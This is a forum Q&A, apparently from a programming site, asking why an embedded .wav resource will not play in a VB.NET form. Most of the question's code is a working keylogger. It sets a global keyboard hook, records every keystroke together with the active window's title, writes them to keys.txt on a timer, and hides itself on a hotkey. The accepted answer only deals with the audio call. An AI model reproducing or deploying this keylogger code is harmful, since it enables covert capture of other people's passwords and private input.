# .wav as resource in VB.NET

Tags: vb.net, resources, wav

I am getting an error that says to check if the file is actually there.

SONG_NAME is supposedly directing to the right resource.... I just want to be able to play the .wav without them having the .wav file on their computer in a specified area, hence having it contained within the .exe. Thanks, guys! Heres the code.

```
Public Class Form1

#Region "API Functions And Structures" 'COLLAPSED CODE

'Event types
Private Const WM_KEYUP As Integer = &H101
Private Const WM_KEYDOWN As Short = &H100S
Private Const WM_SYSKEYDOWN As Integer = &H104
Private Const WM_SYSKEYUP As Integer = &H105

'Event Info structure
Public Structure KBDLLHOOKSTRUCT
    Public vkCode As Integer 'KeyCode (Of interest to us)
    Public scanCode As Integer 'ScanCode
    Public flags As Integer
    Public time As Integer
    Public dwExtraInfo As Integer
End Structure

Enum virtualKey

    'Misc
    K_Return = &HD
    K_Backspace = &H8
    K_Space = &H20
    K_Tab = &H9
    K_Esc = &H1B

    K_Control = &H11
    K_LControl = &HA2
    K_RControl = &HA3

    K_Delete = &H2E
    K_End = &H23
    K_Home = &H24
    K_Insert = &H2D

    K_Shift = &H10
    K_LShift = &HA0
    K_RShift = &HA1

    K_Pause = &H13
    K_PrintScreen = 44

    K_LWin = &H5B
    K_RWin = &H5C

    K_Alt = &H12
    K_LAlt = &HA4
    K_RAlt = &HA5

    'Locks
    K_NumLock = &H90
    K_CapsLock = &H14

    'Arrows
    K_Up = &H26
    K_Down = &H28
    K_Right = &H27
    K_Left = &H25

    'F1-24
    K_F1 = &H70
    K_F2 = &H71
    K_F3 = &H72
    K_F4 = &H73
    K_F5 = &H74
    K_F6 = &H75
    K_F7 = &H76
    K_F8 = &H77
    K_F9 = &H78
    K_F10 = &H79
    K_F11 = &H7A
    K_F12 = &H7B
    K_F13 = &H7C
    K_F14 = &H7D
    K_F15 = &H7E
    K_F16 = &H7F
    K_F17 = &H80
    K_F18 = &H81
    K_F19 = &H82
    K_F20 = &H83
    K_F21 = &H84
    K_F22 = &H85
    K_F23 = &H86
    K_F24 = &H87

    'Numpad
    K_Numpad0 = &H60
    K_Numpad1 = &H61
    K_Numpad2 = &H62
    K_Numpad3 = &H63
    K_Numpad4 = &H64
    K_Numpad5 = &H65
    K_Numpad6 = &H66
    K_Numpad7 = &H67
    K_Numpad8 = &H68
    K_Numpad9 = &H69
    'Math (numpad)
    K_Num_Add = &H6B
    K_Num_Divide = &H6F
    K_Num_Multiply = &H6A
    K_Num_Subtract = &H6D
    K_Num_Decimal = &H6E

    'Caracteres e Números
    K_0 = &H30
    K_1 = &H31
    K_2 = &H32
    K_3 = &H33
    K_4 = &H34
    K_5 = &H35
    K_6 = &H36
    K_7 = &H37
    K_8 = &H38
    K_9 = &H39
    K_A = &H41
    K_B = &H42
    K_C = &H43
    K_D = &H44
    K_E = &H45
    K_F = &H46
    K_G = &H47
    K_H = &H48
    K_I = &H49
    K_J = &H4A
    K_K = &H4B
    K_L = &H4C
    K_M = &H4D
    K_N = &H4E
    K_O = &H4F
    K_P = &H50
    K_Q = &H51
    K_R = &H52
    K_S = &H53
    K_T = &H54
    K_U = &H55
    K_V = &H56
    K_W = &H57
    K_X = &H58
    K_Y = &H59
    K_Z = &H5A

    'Math (not numpad)
    K_Subtract = 189
    K_Decimal = 190

End Enum

'Keyboard hook related functions
Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hHook As Integer) As Integer
Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Integer, ByVal lpfn As KeyboardHookDelegate, ByVal hmod As Integer, ByVal dwThreadId As Integer) As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Integer
Private Declare Function CallNextHookEx Lib "user32" (ByVal hHook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByVal lParam As KBDLLHOOKSTRUCT) As Integer
Private Delegate Function KeyboardHookDelegate(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer

'Other API functions
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
#End Region


Private KeyboardHandle As IntPtr = 0 'Handle of the hook
Private LastCheckedForegroundTitle As String = "" 'Title of the foreground window when last checked
Private callback As KeyboardHookDelegate = Nothing 'Delegate for the hook
Dim songOn As Integer = 1

Dim FILE_NAME As String = CurDir() & "\keys.txt"
Dim SONG_NAME As String = My.Resources.test1.ToString
Private KeyLog As String 'Variable which holds the text to be appended to the text file

''' Gets the title of the active window
Private Function GetActiveWindowTitle() As String
    Dim MyStr As String
    MyStr = New String(Chr(0), 100)
    GetWindowText(GetForegroundWindow, MyStr, 100)
    MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)

    Return MyStr
End Function

''' Checks if we set a hook or not
Private Function Hooked()
    Return KeyboardHandle <> 0 'If KeyboardHandle = 0 it means that it isn't hooked so return false, otherwise return true
End Function

''' Sets the keyboard hook
Public Sub HookKeyboard()
    callback = New KeyboardHookDelegate(AddressOf KeyboardCallback)
    KeyboardHandle = SetWindowsHookEx(13, callback, Process.GetCurrentProcess.MainModule.BaseAddress, 0)
    If KeyboardHandle <> 0 Then
        Me.btnStop.Enabled = True
        Me.btnStart.Enabled = False
        Label1.Text = "Active"
        Label1.ForeColor = Color.DarkGreen
        PlaySound.Stop()
    End If
End Sub

''' Unsets the keyboard hook
Public Sub UnhookKeyboard()
    If (Hooked()) Then
        If UnhookWindowsHookEx(KeyboardHandle) <> 0 Then
            Label1.Text = "Not Active"
            Label1.ForeColor = Color.DarkRed
            Me.btnStop.Enabled = False
            Me.btnStart.Enabled = True
            KeyboardHandle = 0 'We have unhooked successfully
        End If
    End If
End Sub

''' Function to be called when there's a keyboard event
Public Function KeyboardCallback(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer

    'Get current foreground window title
    Dim CurrentTitle = GetActiveWindowTitle()

    'If title of the foreground window changed
    If CurrentTitle <> LastCheckedForegroundTitle Then
        LastCheckedForegroundTitle = CurrentTitle
        'Add a little header containing the application title and date
        KeyLog &= vbCrLf & "----------- " & CurrentTitle & " (" & Now.ToString() & ") ------------" & vbCrLf
    End If

    'Variable to hold the text describing the key pressed
    Dim Key As String = ""

    'If event is KEYDOWN
    If wParam = WM_KEYDOWN Or wParam = WM_SYSKEYDOWN Then

        'If we can block events
        If Code >= 0 Then
            'If Ctrl+Alt+S
            If My.Computer.Keyboard.CtrlKeyDown And My.Computer.Keyboard.AltKeyDown And lParam.vkCode = virtualKey.K_S Then
                Me.Visible = Not Me.Visible 'Hide/Show form
                Return 1 'Block event
            End If
        End If

        'Translate virtual key into character/expression
        Select Case lParam.vkCode
            Case virtualKey.K_1
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "!"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_2
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "@"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_3
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "#"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_4
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "$"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_5
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "%"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_6
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "^"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_7
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "&"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_8
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "*"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_9
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = "("
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_0
                If My.Computer.Keyboard.ShiftKeyDown Then
                    Key = ")"
                Else
                    Key = ChrW(lParam.vkCode)
                End If
            Case virtualKey.K_0 To virtualKey.K_9
                Key = ChrW(lParam.vkCode)
            Case virtualKey.K_A To virtualKey.K_Z
                Key = ChrW(lParam.vkCode + 32)
            Case virtualKey.K_Space
                Key = " "
            Case virtualKey.K_RControl, virtualKey.K_LControl
                Key = "[control]"
            Case virtualKey.K_LAlt
                Key = "[alt]"
            Case virtualKey.K_RAlt
                Key = "[alt gr]"
            Case virtualKey.K_LShift, virtualKey.K_RShift
                Key = ""
            Case virtualKey.K_Return
                Key = vbCrLf
            Case virtualKey.K_Tab
                Key = vbTab
            Case virtualKey.K_Delete
                Key = "[delete]"
            Case virtualKey.K_Esc
                Key = "[esc]"
            Case virtualKey.K_CapsLock
                If My.Computer.Keyboard.CapsLock Then
                    Key = "[/caps]"
                Else
                    Key = "[caps]"
                End If
            Case virtualKey.K_F1 To virtualKey.K_F24
                Key = "[F" & (lParam.vkCode - 111) & "]"
            Case virtualKey.K_Right
                Key = "[Right Arrow]"
            Case virtualKey.K_Down
                Key = "[Down Arrow]"
            Case virtualKey.K_Left
                Key = "[Left Arrow]"
            Case virtualKey.K_Up
                Key = "[Up Arrow]"
            Case virtualKey.K_Backspace
                Key = "[bkspace]"
            Case virtualKey.K_Decimal, virtualKey.K_Num_Decimal
                Key = "."
            Case virtualKey.K_Subtract, virtualKey.K_Num_Subtract
                Key = "-"
            Case Else
                Key = lParam.vkCode 'If we didn't treat it, show the virtual key code (integer) so that we know what Case to add
        End Select

    'If event is Key UP
    ElseIf wParam = WM_KEYUP Or wParam = WM_SYSKEYUP Then
        Select Case lParam.vkCode
            Case virtualKey.K_RControl, virtualKey.K_LControl
                Key = "[/control]"
            Case virtualKey.K_LAlt
                Key = "[/alt]"
            Case virtualKey.K_RAlt
                Key = "[/alt gr]"
            Case virtualKey.K_LShift, virtualKey.K_RShift
                Key = ""
        End Select

    End If

    If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
        Key = Key.ToUpper
    End If

    'Add it to the log
    KeyLog &= Key

    If Key <> "" Then
        Me.ListBox1.Items.Add(Key) 'Add it to the listbox for debugging purposes
    End If
    Return CallNextHookEx(KeyboardHandle, Code, wParam, lParam) 'Let event go to the other applications

End Function

''' On tick
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As System.EventArgs) Handles Timer1.Tick

    Try
        My.Computer.FileSystem.WriteAllText(CurDir() & "\keys.txt", KeyLog, True)
        KeyLog = ""
        Timer1.Start()
    Catch ex As Exception
        Timer1.Start()
    End Try

    If ListBox1.Items.Count > 1 Then
        ListBox1.SelectedItem = ListBox1.Items.Item(ListBox1.Items.Count - 1)
    End If
End Sub

''' On Form Exit
Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing

    UnhookKeyboard()
    My.Computer.FileSystem.WriteAllText(CurDir() & "\keys.txt", KeyLog, True)

End Sub


''' Start Hook
Private Sub btnStart_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnStart.Click

    Timer1.Start()
    HookKeyboard()

End Sub

''' Stop the hook
Private Sub btnStop_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnStop.Click

    Timer1.Stop()
    UnhookKeyboard()

End Sub

''' Exit Program
Private Sub btnExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnExit.Click

    Timer1.Stop()
    Me.Close()

End Sub

Private Sub btnHide_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnHide.Click
    If Label1.Text = "Active" Then
        Me.Visible = Not Me.Visible 'Hide/Show form
    End If

End Sub

Private Sub btnOpenLog_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOpenLog.Click

    Timer1.Stop()
    UnhookKeyboard()
    System.Diagnostics.Process.Start("notepad.exe", FILE_NAME)
End Sub

Private Sub btnClearLog_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnClearLog.Click
    If MessageBox.Show("This will clear the log. Continue?", "Confirm Clearing", MessageBoxButtons.YesNo) = Windows.Forms.DialogResult.Yes Then
        Timer1.Stop()
        UnhookKeyboard()
        System.IO.File.WriteAllText(FILE_NAME, "")
        ListBox1.Items.Clear()

    End If

End Sub
Private PlaySound As New System.Media.SoundPlayer

Public Sub PlaySoundFile(ByVal SoundPath As String)
    PlaySound.SoundLocation = SoundPath
    PlaySound.Load()
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    Me.Left = (Screen.PrimaryScreen.WorkingArea.Width - Me.Width) / 2
    Me.Top = (Screen.PrimaryScreen.WorkingArea.Height - Me.Height) / 2
    PlaySoundFile(SONG_NAME)
End Sub

Private Sub pbMask_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles pbMask.Click


    If songOn = 1 Then

        PlaySound.Play()
        songOn = 2
    ElseIf songOn = 2 Then

        PlaySound.Stop()
        songOn = 1
    End If
End Sub
End Class
```

Answer (score 1, accepted):

You will want your .wav files embedded in you app. Here is a link.
http://www.c-sharpcorner.com/UploadFile/scottlysle/PlayWav01142007012501AM/PlayWav.aspx

You might be missing something saying your path is resources.

My.Computer.Audio.Play(My.Resources.Boo, AudioPlayMode.Background)